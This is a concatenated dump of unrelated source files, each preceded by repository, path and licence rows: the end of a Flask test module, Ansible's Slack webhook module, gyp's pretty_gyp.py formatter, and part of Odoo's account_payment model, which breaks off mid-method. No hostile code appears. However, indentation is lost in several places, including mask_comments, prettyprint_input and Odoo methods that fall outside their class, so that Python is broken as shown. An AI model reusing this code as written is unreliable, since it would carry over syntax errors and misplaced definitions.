                Wrapper(generate())))
        c = app.test_client()
        rv = c.get('/?name=World')
        self.assertEqual(rv.data, b'Hello World!')
        self.assertEqual(called, [42])
def suite():
    """Assemble the test suite for this module.

    JSON tests are only included when flask detected a usable json module.
    """
    tests = unittest.TestSuite()
    case_classes = [SendfileTestCase, LoggingTestCase,
                    NoImportsTestCase, StreamingTestCase]
    if flask.json_available:
        case_classes.insert(0, JSONTestCase)
    for case_class in case_classes:
        tests.addTest(unittest.makeSuite(case_class))
    return tests
| apache-2.0 |
m2candre/ansible-modules-extras | notification/slack.py | 61 | 7655 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ramon de la Fuente <ramon@delafuente.nl>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
module: slack
short_description: Send Slack notifications
description:
- The M(slack) module sends notifications to U(http://slack.com) via the Incoming WebHook integration
version_added: 1.6
author: "Ramon de la Fuente (@ramondelafuente)"
options:
domain:
description:
- Slack (sub)domain for your environment without protocol. (i.e.
C(future500.slack.com)) In 1.8 and beyond, this is deprecated and may
be ignored. See token documentation for information.
required: false
token:
description:
- Slack integration token. This authenticates you to the slack service.
Prior to 1.8, a token looked like C(3Ffe373sfhRE6y42Fg3rvf4GlK). In
1.8 and above, ansible adapts to the new slack API where tokens look
like C(G922VJP24/D921DW937/3Ffe373sfhRE6y42Fg3rvf4GlK). If tokens
are in the new format then slack will ignore any value of domain. If
the token is in the old format the domain is required. Ansible has no
control of when slack will get rid of the old API. When slack does
that the old format will stop working.
required: true
msg:
description:
- Message to send.
required: true
channel:
description:
- Channel to send the message to. If absent, the message goes to the channel selected for the I(token).
required: false
username:
description:
- This is the sender of the message.
required: false
default: ansible
icon_url:
description:
- Url for the message sender's icon (default C(http://www.ansible.com/favicon.ico))
required: false
icon_emoji:
description:
- Emoji for the message sender. See Slack documentation for options.
(if I(icon_emoji) is set, I(icon_url) will not be used)
required: false
link_names:
description:
- Automatically create links for channels and usernames in I(msg).
required: false
default: 1
choices:
- 1
- 0
parse:
description:
- Setting for the message parser at Slack
required: false
choices:
- 'full'
- 'none'
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices:
- 'yes'
- 'no'
color:
version_added: 2.0
description:
- Allow text to use default colors - use the default of 'normal' to not send a custom color bar at the start of the message
required: false
default: 'normal'
choices:
- 'normal'
- 'good'
- 'warning'
- 'danger'
"""
EXAMPLES = """
- name: Send notification message via Slack
local_action:
module: slack
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} completed"
- name: Send notification message via Slack all options
local_action:
module: slack
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} completed"
channel: "#ansible"
username: "Ansible on {{ inventory_hostname }}"
icon_url: "http://www.example.com/some-image-file.png"
link_names: 0
parse: 'none'
- name: insert a color bar in front of the message for visibility purposes and use the default webhook icon and name configured in Slack
slack:
domain: future500.slack.com
token: thetokengeneratedbyslack
msg: "{{ inventory_hostname }} is alive!"
color: good
username: ""
icon_url: ""
"""
# Legacy per-team endpoint (token passed in the query string, requires the
# Slack (sub)domain) and the current hooks.slack.com endpoint (token is the
# path component of the URL).
OLD_SLACK_INCOMING_WEBHOOK = 'https://%s/services/hooks/incoming-webhook?token=%s'
SLACK_INCOMING_WEBHOOK = 'https://hooks.slack.com/services/%s'
def build_payload_for_slack(module, text, channel, username, icon_url, icon_emoji, link_names, parse, color):
    """Build the 'payload=<json>' form body expected by the Slack webhook."""
    # 'normal' means no colored attachment bar; any other color wraps the
    # text in a single attachment carrying that color.
    if color == 'normal':
        body = dict(text=text)
    else:
        body = dict(attachments=[dict(text=text, color=color)])

    if channel is not None:
        # A leading '#' (channel) or '@' (direct message) is kept verbatim;
        # anything else is treated as a plain channel name.
        if channel[0] in ('#', '@'):
            body['channel'] = channel
        else:
            body['channel'] = '#' + channel
    if username is not None:
        body['username'] = username
    # icon_emoji takes precedence over icon_url when both are supplied.
    if icon_emoji is not None:
        body['icon_emoji'] = icon_emoji
    else:
        body['icon_url'] = icon_url
    if link_names is not None:
        body['link_names'] = link_names
    if parse is not None:
        body['parse'] = parse

    return "payload=" + module.jsonify(body)
def do_notify_slack(module, domain, token, payload):
    """POST *payload* to the Slack incoming-webhook endpoint.

    New-style tokens (containing two or more '/') address hooks.slack.com
    directly; old-style tokens require *domain* and use the legacy per-domain
    URL.  Fails the module on any non-200 response.
    """
    if token.count('/') >= 2:
        # New style token
        slack_incoming_webhook = SLACK_INCOMING_WEBHOOK % (token)
    else:
        if not domain:
            module.fail_json(msg="Slack has updated its webhook API. You need to specify a token of the form XXXX/YYYY/ZZZZ in your playbook")
        slack_incoming_webhook = OLD_SLACK_INCOMING_WEBHOOK % (domain, token)
    response, info = fetch_url(module, slack_incoming_webhook, data=payload)
    if info['status'] != 200:
        # Obscure the secret part of whichever URL was actually used so the
        # token never leaks into error output.  (Previously the new-style URL
        # was always rendered here, even for legacy domain/token hooks, which
        # made the reported endpoint wrong.)
        if token.count('/') >= 2:
            obscured_incoming_webhook = SLACK_INCOMING_WEBHOOK % ('[obscured]')
        else:
            obscured_incoming_webhook = OLD_SLACK_INCOMING_WEBHOOK % (domain, '[obscured]')
        module.fail_json(msg=" failed to send %s to %s: %s" % (payload, obscured_incoming_webhook, info['msg']))
def main():
    """Module entry point: parse arguments, build the payload, POST it."""
    module = AnsibleModule(
        argument_spec = dict(
            domain = dict(type='str', required=False, default=None),
            # no_log keeps the secret token out of logs and -vvv output.
            token = dict(type='str', required=True, no_log=True),
            msg = dict(type='str', required=True),
            channel = dict(type='str', default=None),
            username = dict(type='str', default='Ansible'),
            icon_url = dict(type='str', default='http://www.ansible.com/favicon.ico'),
            icon_emoji = dict(type='str', default=None),
            link_names = dict(type='int', default=1, choices=[0,1]),
            parse = dict(type='str', default=None, choices=['none', 'full']),
            # validate_certs is honoured by fetch_url(), not read explicitly.
            validate_certs = dict(default='yes', type='bool'),
            color = dict(type='str', default='normal', choices=['normal', 'good', 'warning', 'danger'])
        )
    )
    domain = module.params['domain']
    token = module.params['token']
    text = module.params['msg']
    channel = module.params['channel']
    username = module.params['username']
    icon_url = module.params['icon_url']
    icon_emoji = module.params['icon_emoji']
    link_names = module.params['link_names']
    parse = module.params['parse']
    color = module.params['color']
    # Build the urlform body and ship it; do_notify_slack fails the module
    # itself on error, so reaching exit_json means success.
    payload = build_payload_for_slack(module, text, channel, username, icon_url, icon_emoji, link_names, parse, color)
    do_notify_slack(module, domain, token, payload)
    module.exit_json(msg="OK")
# import module snippets
# NOTE(review): star imports at the bottom follow the (old) Ansible module
# convention — these helpers are injected into the module at runtime.
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
main()
| gpl-3.0 |
RajeevG96/Portfolio-Website | node_modules/node-gyp/gyp/tools/pretty_gyp.py | 2618 | 4756 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pretty-prints the contents of a GYP file."""
import sys
import re
# Regex to remove comments when we're counting braces.
COMMENT_RE = re.compile(r'\s*#.*')
# Regex to remove quoted strings when we're counting braces.
# It takes into account quoted quotes, and makes sure that the quotes match.
# NOTE: It does not handle quotes that span more than one line, or
# cases where an escaped quote is preceded by an escaped backslash.
QUOTE_RE_STR = r'(?P<q>[\'"])(.*?)(?<![^\\][\\])(?P=q)'
QUOTE_RE = re.compile(QUOTE_RE_STR)
def comment_replace(matchobj):
  # Keep the code prefix and the '#' marker, but overwrite the comment text
  # with an equal-length run of '#' so column positions are preserved while
  # the content (possibly containing braces) is hidden.
  prefix = matchobj.group(1)
  marker = matchobj.group(2)
  comment_text = matchobj.group(3)
  return prefix + marker + '#' * len(comment_text)
def mask_comments(input):
"""Mask the quoted strings so we skip braces inside quoted strings."""
search_re = re.compile(r'(.*?)(#)(.*)')
return [search_re.sub(comment_replace, line) for line in input]
def quote_replace(matchobj):
  # Preserve the prefix and both quote characters, but blank the quoted
  # body out with 'x's of the same length so any braces inside it are
  # invisible to the brace counter.
  quote_char = matchobj.group(2)
  quoted_body = matchobj.group(3)
  return matchobj.group(1) + quote_char + 'x' * len(quoted_body) + quote_char
def mask_quotes(input):
  """Blank out quoted-string bodies so braces inside them are never counted."""
  quoted_re = re.compile(r'(.*?)' + QUOTE_RE_STR)
  return [quoted_re.sub(quote_replace, masked_line) for masked_line in input]
def do_split(input, masked_input, search_re):
  # Insert break markers (the literal two characters r'\n', later split on)
  # at every point where search_re matches the *masked* line, so braces that
  # live inside quotes or comments never trigger a split.  The real and
  # masked line lists are mutated in lockstep so subsequent passes can keep
  # matching against the masked text while emitting the real text.
  output = []
  mask_output = []
  for (line, masked_line) in zip(input, masked_input):
    m = search_re.match(masked_line)
    while m:
      # group(1) is everything up to the split point; insert the marker
      # there in BOTH lines, then re-match to catch further occurrences.
      split = len(m.group(1))
      line = line[:split] + r'\n' + line[split:]
      masked_line = masked_line[:split] + r'\n' + masked_line[split:]
      m = search_re.match(masked_line)
    output.extend(line.split(r'\n'))
    mask_output.extend(masked_line.split(r'\n'))
  return (output, mask_output)
def split_double_braces(input):
  """Masks out the quotes and comments, and then splits appropriate
  lines (lines that match the double_*_brace re's below) before
  indenting them below.

  These are used to split lines which have multiple braces on them, so
  that the indentation looks prettier when all laid out (e.g. closing
  braces make a nice diagonal line).
  """
  # An opening bracket following another opening bracket (or comma), and a
  # closing bracket following another closing bracket, with optional space.
  double_open_brace_re = re.compile(r'(.*?[\[\{\(,])(\s*)([\[\{\(])')
  double_close_brace_re = re.compile(r'(.*?[\]\}\)],?)(\s*)([\]\}\)])')
  # Mask quotes first, then comments, so brace-like characters inside
  # either are invisible to the splitting regexes.
  masked_input = mask_quotes(input)
  masked_input = mask_comments(masked_input)
  (output, mask_output) = do_split(input, masked_input, double_open_brace_re)
  (output, mask_output) = do_split(output, mask_output, double_close_brace_re)
  return output
def count_braces(line):
  """Return (delta, after) describing *line*'s net bracket count.

  delta is +1 per opening and -1 per closing bracket/brace/paren, computed
  after comments and quoted strings have been stripped out.  ``after`` tells
  the caller whether the indent change should take effect after printing the
  line (opening lines, or closing lines that carry leading content) rather
  than before it.
  """
  closing_prefix_re = re.compile(r'(.*?[^\s\]\}\)]+.*?)([\]\}\)],?)\s*$')

  stripped = COMMENT_RE.sub(r'', line)
  stripped = QUOTE_RE.sub(r"''", stripped)

  delta = 0
  for ch in stripped:
    if ch in '[({':
      delta += 1
    elif ch in '])}':
      delta -= 1

  # Net-opening lines indent after printing.  A net-closing line whose
  # closing brace is preceded by real content also stays at the current
  # level until after it is printed.
  after = delta > 0 or (delta < 0 and bool(closing_prefix_re.match(stripped)))
  return (delta, after)
def prettyprint_input(lines):
"""Does the main work of indenting the input based on the brace counts."""
indent = 0
basic_offset = 2
last_line = ""
for line in lines:
if COMMENT_RE.match(line):
print line
else:
line = line.strip('\r\n\t ') # Otherwise doesn't strip \r on Unix.
if len(line) > 0:
(brace_diff, after) = count_braces(line)
if brace_diff != 0:
if after:
print " " * (basic_offset * indent) + line
indent += brace_diff
else:
indent += brace_diff
print " " * (basic_offset * indent) + line
else:
print " " * (basic_offset * indent) + line
else:
print ""
last_line = line
def main():
  """Read gyp text from a file argument or stdin, pretty-print to stdout."""
  if len(sys.argv) > 1:
    # Use a context manager so the file handle is closed deterministically
    # (the old code leaked the handle returned by open()).
    with open(sys.argv[1]) as f:
      data = f.read().splitlines()
  else:
    data = sys.stdin.read().splitlines()
  # Split up the double braces.
  lines = split_double_braces(data)

  # Indent and print the output.
  prettyprint_input(lines)

  return 0
# Allow use both as an importable library and as a command-line filter.
if __name__ == '__main__':
  sys.exit(main())
| mit |
pepetreshere/odoo | addons/account/models/account_payment.py | 1 | 39985 | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import UserError, ValidationError
class AccountPaymentMethod(models.Model):
    """A way of sending or receiving money (e.g. manual, check, electronic)."""
    _name = "account.payment.method"
    _description = "Payment Methods"
    _order = 'sequence'
    name = fields.Char(required=True, translate=True)
    code = fields.Char(required=True)  # For internal identification
    # Whether this method is used to receive ('inbound') or send ('outbound').
    payment_type = fields.Selection([('inbound', 'Inbound'), ('outbound', 'Outbound')], required=True)
    sequence = fields.Integer(help='Used to order Methods in the form view', default=10)
class AccountPayment(models.Model):
    _name = "account.payment"
    # Delegation inheritance: every payment owns (and proxies the fields of)
    # an account.move journal entry through move_id.
    _inherits = {'account.move': 'move_id'}
    _inherit = ['mail.thread', 'mail.activity.mixin']
    _description = "Payments"
    _order = "date desc, name desc"
    _check_company_auto = True
def _get_default_journal(self):
''' Retrieve the default journal for the account.payment.
/!\ This method will not override the method in 'account.move' because the ORM
doesn't allow overriding methods using _inherits. Then, this method will be called
manually in 'create' and 'new'.
:return: An account.journal record.
'''
return self.env['account.move']._search_default_journal(('bank', 'cash'))
# == Business fields ==
move_id = fields.Many2one(
comodel_name='account.move',
string='Journal Entry', required=True, readonly=True, ondelete='cascade',
check_company=True)
is_reconciled = fields.Boolean(string="Is Reconciled", store=True,
compute='_compute_reconciliation_status',
help="Technical field indicating if the payment is already reconciled.")
is_matched = fields.Boolean(string="Is Matched With a Bank Statement", store=True,
compute='_compute_reconciliation_status',
help="Technical field indicating if the payment has been matched with a statement line.")
partner_bank_id = fields.Many2one('res.partner.bank', string="Recipient Bank Account",
readonly=False, store=True,
compute='_compute_partner_bank_id',
domain="[('partner_id', '=', partner_id)]",
check_company=True)
is_internal_transfer = fields.Boolean(string="Is Internal Transfer",
readonly=False, store=True,
compute="_compute_is_internal_transfer")
qr_code = fields.Char(string="QR Code",
compute="_compute_qr_code",
help="QR-code report URL to use to generate the QR-code to scan with a banking app to perform this payment.")
# == Payment methods fields ==
payment_method_id = fields.Many2one('account.payment.method', string='Payment Method',
readonly=False, store=True,
compute='_compute_payment_method_id',
domain="[('id', 'in', available_payment_method_ids)]",
help="Manual: Get paid by cash, check or any other method outside of Odoo.\n"\
"Electronic: Get paid automatically through a payment acquirer by requesting a transaction on a card saved by the customer when buying or subscribing online (payment token).\n"\
"Check: Pay bill by check and print it from Odoo.\n"\
"Batch Deposit: Encase several customer checks at once by generating a batch deposit to submit to your bank. When encoding the bank statement in Odoo, you are suggested to reconcile the transaction with the batch deposit.To enable batch deposit, module account_batch_payment must be installed.\n"\
"SEPA Credit Transfer: Pay bill from a SEPA Credit Transfer file you submit to your bank. To enable sepa credit transfer, module account_sepa must be installed ")
available_payment_method_ids = fields.Many2many('account.payment.method',
compute='_compute_payment_method_fields')
hide_payment_method = fields.Boolean(
compute='_compute_payment_method_fields',
help="Technical field used to hide the payment method if the selected journal has only one available which is 'manual'")
# == Synchronized fields with the account.move.lines ==
amount = fields.Monetary(currency_field='currency_id')
payment_type = fields.Selection([
('outbound', 'Send Money'),
('inbound', 'Receive Money'),
], string='Payment Type', default='inbound', required=True)
partner_type = fields.Selection([
('customer', 'Customer'),
('supplier', 'Vendor'),
], default='customer', tracking=True, required=True)
payment_reference = fields.Char(string="Payment Reference", copy=False,
help="Reference of the document used to issue this payment. Eg. check number, file name, etc.")
currency_id = fields.Many2one('res.currency', string='Currency', store=True, readonly=False,
compute='_compute_currency_id',
help="The payment's currency.")
partner_id = fields.Many2one(
comodel_name='res.partner',
string="Customer/Vendor",
store=True, readonly=False, ondelete='restrict',
compute='_compute_partner_id',
domain="['|', ('parent_id','=', False), ('is_company','=', True)]",
check_company=True)
destination_account_id = fields.Many2one(
comodel_name='account.account',
string='Destination Account',
store=True, readonly=False,
compute='_compute_destination_account_id',
domain="[('user_type_id.type', 'in', ('receivable', 'payable')), ('company_id', '=', company_id)]",
check_company=True)
# == Stat buttons ==
reconciled_invoice_ids = fields.Many2many('account.move', string="Reconciled Invoices",
compute='_compute_stat_buttons_from_reconciliation',
help="Invoices whose journal items have been reconciled with these payments.")
reconciled_invoices_count = fields.Integer(string="# Reconciled Invoices",
compute="_compute_stat_buttons_from_reconciliation")
reconciled_bill_ids = fields.Many2many('account.move', string="Reconciled Bills",
compute='_compute_stat_buttons_from_reconciliation',
help="Invoices whose journal items have been reconciled with these payments.")
reconciled_bills_count = fields.Integer(string="# Reconciled Bills",
compute="_compute_stat_buttons_from_reconciliation")
reconciled_statement_ids = fields.Many2many('account.move', string="Reconciled Statements",
compute='_compute_stat_buttons_from_reconciliation',
help="Statements matched to this payment")
reconciled_statements_count = fields.Integer(string="# Reconciled Statements",
compute="_compute_stat_buttons_from_reconciliation")
# == Display purpose fields ==
payment_method_code = fields.Char(
related='payment_method_id.code',
help="Technical field used to adapt the interface to the payment type selected.")
show_partner_bank_account = fields.Boolean(
compute='_compute_show_require_partner_bank',
help="Technical field used to know whether the field `partner_bank_id` needs to be displayed or not in the payments form views")
require_partner_bank_account = fields.Boolean(
compute='_compute_show_require_partner_bank',
help="Technical field used to know whether the field `partner_bank_id` needs to be required or not in the payments form views")
country_code = fields.Char(related='company_id.country_id.code')
_sql_constraints = [
(
'check_amount_not_negative',
'CHECK(amount >= 0.0)',
"The payment amount cannot be negative.",
),
]
# -------------------------------------------------------------------------
# HELPERS
# -------------------------------------------------------------------------
    def _seek_for_lines(self):
        ''' Helper used to dispatch the journal items between:
        - The lines using the temporary liquidity account.
        - The lines using the counterpart account.
        - The lines being the write-off lines.
        :return: (liquidity_lines, counterpart_lines, writeoff_lines)
        '''
        self.ensure_one()
        liquidity_lines = self.env['account.move.line']
        counterpart_lines = self.env['account.move.line']
        writeoff_lines = self.env['account.move.line']
        for line in self.move_id.line_ids:
            if line.account_id in (
                self.journal_id.default_account_id,
                self.journal_id.payment_debit_account_id,
                self.journal_id.payment_credit_account_id,
            ):
                # Lines hitting the journal's liquidity / outstanding accounts.
                liquidity_lines += line
            elif line.account_id.internal_type in ('receivable', 'payable') or line.partner_id == line.company_id.partner_id:
                # Receivable/payable counterpart, or the company's own partner
                # (internal transfer case).
                counterpart_lines += line
            else:
                # Anything else is considered a write-off line.
                writeoff_lines += line
        return liquidity_lines, counterpart_lines, writeoff_lines
    def _prepare_move_line_default_vals(self, write_off_line_vals=None):
        ''' Prepare the dictionary to create the default account.move.lines for the current payment.
        :param write_off_line_vals: Optional dictionary to create a write-off account.move.line easily containing:
            * amount: The amount to be added to the counterpart amount.
            * name: The label to set on the line.
            * account_id: The account on which create the write-off.
        :return: A list of python dictionary to be passed to the account.move.line's 'create' method.
        '''
        self.ensure_one()
        write_off_line_vals = write_off_line_vals or {}
        if not self.journal_id.payment_debit_account_id or not self.journal_id.payment_credit_account_id:
            raise UserError(_(
                "You can't create a new payment without an outstanding payments/receipts account set on the %s journal.",
                self.journal_id.display_name))
        # Compute amounts.
        # Sign convention: inbound money is a negative counterpart (credit on
        # the receivable side), outbound is positive.
        write_off_amount = write_off_line_vals.get('amount', 0.0)
        if self.payment_type == 'inbound':
            # Receive money.
            counterpart_amount = -self.amount
            write_off_amount *= -1
        elif self.payment_type == 'outbound':
            # Send money.
            counterpart_amount = self.amount
        else:
            counterpart_amount = 0.0
            write_off_amount = 0.0
        # Balances are in company currency; *_amount_currency stay in the
        # payment currency.
        balance = self.currency_id._convert(counterpart_amount, self.company_id.currency_id, self.company_id, self.date)
        counterpart_amount_currency = counterpart_amount
        write_off_balance = self.currency_id._convert(write_off_amount, self.company_id.currency_id, self.company_id, self.date)
        write_off_amount_currency = write_off_amount
        currency_id = self.currency_id.id
        if self.is_internal_transfer:
            if self.payment_type == 'inbound':
                liquidity_line_name = _('Transfer to %s', self.journal_id.name)
            else: # payment.payment_type == 'outbound':
                liquidity_line_name = _('Transfer from %s', self.journal_id.name)
        else:
            liquidity_line_name = self.payment_reference
        # Compute a default label to set on the journal items.
        payment_display_name = {
            'outbound-customer': _("Customer Reimbursement"),
            'inbound-customer': _("Customer Payment"),
            'outbound-supplier': _("Vendor Payment"),
            'inbound-supplier': _("Vendor Reimbursement"),
        }
        default_line_name = self.env['account.move.line']._get_default_line_name(
            _("Internal Transfer") if self.is_internal_transfer else payment_display_name['%s-%s' % (self.payment_type, self.partner_type)],
            self.amount,
            self.currency_id,
            self.date,
            partner=self.partner_id,
        )
        line_vals_list = [
            # Liquidity line.
            {
                'name': liquidity_line_name or default_line_name,
                'date_maturity': self.date,
                'amount_currency': -counterpart_amount_currency,
                'currency_id': currency_id,
                'debit': balance < 0.0 and -balance or 0.0,
                'credit': balance > 0.0 and balance or 0.0,
                'partner_id': self.partner_id.id,
                'account_id': self.journal_id.payment_debit_account_id.id if balance < 0.0 else self.journal_id.payment_credit_account_id.id,
            },
            # Receivable / Payable.
            {
                'name': self.payment_reference or default_line_name,
                'date_maturity': self.date,
                'amount_currency': counterpart_amount_currency + write_off_amount_currency if currency_id else 0.0,
                'currency_id': currency_id,
                'debit': balance + write_off_balance > 0.0 and balance + write_off_balance or 0.0,
                'credit': balance + write_off_balance < 0.0 and -balance - write_off_balance or 0.0,
                'partner_id': self.partner_id.id,
                'account_id': self.destination_account_id.id,
            },
        ]
        if write_off_balance:
            # Write-off line.
            line_vals_list.append({
                'name': write_off_line_vals.get('name') or default_line_name,
                'amount_currency': -write_off_amount_currency,
                'currency_id': currency_id,
                'debit': write_off_balance < 0.0 and -write_off_balance or 0.0,
                'credit': write_off_balance > 0.0 and write_off_balance or 0.0,
                'partner_id': self.partner_id.id,
                'account_id': write_off_line_vals.get('account_id'),
            })
        return line_vals_list
# -------------------------------------------------------------------------
# COMPUTE METHODS
# -------------------------------------------------------------------------
    @api.depends('move_id.line_ids.amount_residual', 'move_id.line_ids.amount_residual_currency', 'move_id.line_ids.account_id')
    def _compute_reconciliation_status(self):
        ''' Compute the field indicating if the payments are already reconciled with something.
        This field is used for display purpose (e.g. display the 'reconcile' button redirecting to the reconciliation
        widget).
        '''
        for pay in self:
            liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()
            if not pay.currency_id or not pay.id:
                # Unsaved record or no currency: nothing can be reconciled yet.
                pay.is_reconciled = False
                pay.is_matched = False
            elif pay.currency_id.is_zero(pay.amount):
                # Zero-amount payments are trivially reconciled and matched.
                pay.is_reconciled = True
                pay.is_matched = True
            else:
                # Compare residuals in the payment currency when it differs
                # from the company currency.
                residual_field = 'amount_residual' if pay.currency_id == pay.company_id.currency_id else 'amount_residual_currency'
                if pay.journal_id.default_account_id and pay.journal_id.default_account_id in liquidity_lines.account_id:
                    # Allow user managing payments without any statement lines by using the bank account directly.
                    # In that case, the user manages transactions only using the register payment wizard.
                    pay.is_matched = True
                else:
                    pay.is_matched = pay.currency_id.is_zero(sum(liquidity_lines.mapped(residual_field)))
                reconcile_lines = (counterpart_lines + writeoff_lines).filtered(lambda line: line.account_id.reconcile)
                pay.is_reconciled = pay.currency_id.is_zero(sum(reconcile_lines.mapped(residual_field)))
    @api.model
    def _get_method_codes_using_bank_account(self):
        # Payment method codes for which the recipient bank account field is
        # displayed on the form view (see _compute_show_require_partner_bank);
        # meant to be extended by other modules.
        return ['manual']
    @api.model
    def _get_method_codes_needing_bank_account(self):
        # Payment method codes for which the recipient bank account is
        # mandatory on draft payments; empty here, extended by other modules.
        return []
@api.depends('payment_method_code')
def _compute_show_require_partner_bank(self):
""" Computes if the destination bank account must be displayed in the payment form view. By default, it
won't be displayed but some modules might change that, depending on the payment type."""
for payment in self:
payment.show_partner_bank_account = payment.payment_method_code in self._get_method_codes_using_bank_account()
payment.require_partner_bank_account = payment.state == 'draft' and payment.payment_method_code in self._get_method_codes_needing_bank_account()
@api.depends('partner_id')
def _compute_partner_bank_id(self):
''' The default partner_bank_id will be the first available on the partner. '''
for pay in self:
available_partner_bank_accounts = pay.partner_id.bank_ids.filtered(lambda x: x.company_id in (False, pay.company_id))
if available_partner_bank_accounts:
pay.partner_bank_id = available_partner_bank_accounts[0]._origin
else:
pay.partner_bank_id = False
@api.depends('partner_id', 'destination_account_id', 'journal_id')
def _compute_is_internal_transfer(self):
for payment in self:
is_partner_ok = payment.partner_id == payment.journal_id.company_id.partner_id
is_account_ok = payment.destination_account_id and payment.destination_account_id == payment.journal_id.company_id.transfer_account_id
payment.is_internal_transfer = is_partner_ok and is_account_ok
@api.depends('payment_type', 'journal_id')
def _compute_payment_method_id(self):
''' Compute the 'payment_method_id' field.
This field is not computed in '_compute_payment_method_fields' because it's a stored editable one.
'''
for pay in self:
if pay.payment_type == 'inbound':
available_payment_methods = pay.journal_id.inbound_payment_method_ids
else:
available_payment_methods = pay.journal_id.outbound_payment_method_ids
# Select the first available one by default.
if available_payment_methods:
pay.payment_method_id = available_payment_methods[0]._origin
else:
pay.payment_method_id = False
@api.depends('payment_type',
'journal_id.inbound_payment_method_ids',
'journal_id.outbound_payment_method_ids')
def _compute_payment_method_fields(self):
for pay in self:
if pay.payment_type == 'inbound':
pay.available_payment_method_ids = pay.journal_id.inbound_payment_method_ids
else:
pay.available_payment_method_ids = pay.journal_id.outbound_payment_method_ids
pay.hide_payment_method = len(pay.available_payment_method_ids) == 1 and pay.available_payment_method_ids.code == 'manual'
@api.depends('journal_id')
def _compute_currency_id(self):
for pay in self:
pay.currency_id = pay.journal_id.currency_id or pay.journal_id.company_id.currency_id
    @api.depends('is_internal_transfer')
    def _compute_partner_id(self):
        # Internal transfers force the partner to the company itself; leaving
        # transfer mode clears that forced partner; any other value is kept
        # (the final self-assignment preserves the user's choice instead of
        # letting the compute wipe it).
        for pay in self:
            if pay.is_internal_transfer:
                pay.partner_id = pay.journal_id.company_id.partner_id
            elif pay.partner_id == pay.journal_id.company_id.partner_id:
                pay.partner_id = False
            else:
                pay.partner_id = pay.partner_id
    @api.depends('journal_id', 'partner_id', 'partner_type', 'is_internal_transfer')
    def _compute_destination_account_id(self):
        # Reset for all records first; the loop then fills each one in.
        self.destination_account_id = False
        for pay in self:
            if pay.is_internal_transfer:
                pay.destination_account_id = pay.journal_id.company_id.transfer_account_id
            elif pay.partner_type == 'customer':
                # Receive money from invoice or send money to refund it.
                if pay.partner_id:
                    pay.destination_account_id = pay.partner_id.with_company(pay.company_id).property_account_receivable_id
                else:
                    # No partner yet: fall back to the company's first
                    # receivable account.
                    pay.destination_account_id = self.env['account.account'].search([
                        ('company_id', '=', pay.company_id.id),
                        ('internal_type', '=', 'receivable'),
                    ], limit=1)
            elif pay.partner_type == 'supplier':
                # Send money to pay a bill or receive money to refund it.
                if pay.partner_id:
                    pay.destination_account_id = pay.partner_id.with_company(pay.company_id).property_account_payable_id
                else:
                    # No partner yet: fall back to the company's first
                    # payable account.
                    pay.destination_account_id = self.env['account.account'].search([
                        ('company_id', '=', pay.company_id.id),
                        ('internal_type', '=', 'payable'),
                    ], limit=1)
@api.depends('partner_bank_id', 'amount', 'ref', 'currency_id', 'journal_id', 'move_id.state',
'payment_method_id', 'payment_type')
def _compute_qr_code(self):
for pay in self:
if pay.state in ('draft', 'posted') \
and pay.partner_bank_id \
and pay.payment_method_id.code == 'manual' \
and pay.payment_type == 'outbound' \
and pay.currency_id:
if pay.partner_bank_id:
qr_code = pay.partner_bank_id.build_qr_code_url(pay.amount, pay.ref, pay.ref, pay.currency_id, pay.partner_id)
else:
qr_code = None
if qr_code:
pay.qr_code = '''
<br/>
<img class="border border-dark rounded" src="{qr_code}"/>
<br/>
<strong class="text-center">{txt}</strong>
'''.format(txt = _('Scan me with your banking app.'),
qr_code = qr_code)
continue
pay.qr_code = None
@api.depends('move_id.line_ids.matched_debit_ids', 'move_id.line_ids.matched_credit_ids')
def _compute_stat_buttons_from_reconciliation(self):
    ''' Retrieve the invoices reconciled to the payments through the reconciliation (account.partial.reconcile). '''
    # Only payments already stored in the database can have partial
    # reconciliations; new (unsaved) records get empty stat fields.
    stored_payments = self.filtered('id')
    if not stored_payments:
        self.reconciled_invoice_ids = False
        self.reconciled_invoices_count = 0
        self.reconciled_bill_ids = False
        self.reconciled_bills_count = 0
        self.reconciled_statement_ids = False
        self.reconciled_statements_count = 0
        return

    # Push pending ORM changes to the database so the raw SQL below sees them.
    self.env['account.move'].flush()
    self.env['account.move.line'].flush()
    self.env['account.partial.reconcile'].flush()

    # Per payment, collect the invoices/bills reconciled with it through a
    # partial reconciliation on a receivable/payable journal item.
    self._cr.execute('''
        SELECT
            payment.id,
            ARRAY_AGG(DISTINCT invoice.id) AS invoice_ids,
            invoice.move_type
        FROM account_payment payment
        JOIN account_move move ON move.id = payment.move_id
        JOIN account_move_line line ON line.move_id = move.id
        JOIN account_partial_reconcile part ON
            part.debit_move_id = line.id
            OR
            part.credit_move_id = line.id
        JOIN account_move_line counterpart_line ON
            part.debit_move_id = counterpart_line.id
            OR
            part.credit_move_id = counterpart_line.id
        JOIN account_move invoice ON invoice.id = counterpart_line.move_id
        JOIN account_account account ON account.id = line.account_id
        WHERE account.internal_type IN ('receivable', 'payable')
            AND payment.id IN %(payment_ids)s
            AND line.id != counterpart_line.id
            AND invoice.move_type in ('out_invoice', 'out_refund', 'in_invoice', 'in_refund', 'out_receipt', 'in_receipt')
        GROUP BY payment.id, invoice.move_type
    ''', {
        'payment_ids': tuple(stored_payments.ids)
    })
    query_res = self._cr.dictfetchall()
    self.reconciled_invoice_ids = self.reconciled_invoices_count = False
    self.reconciled_bill_ids = self.reconciled_bills_count = False
    for res in query_res:
        pay = self.browse(res['id'])
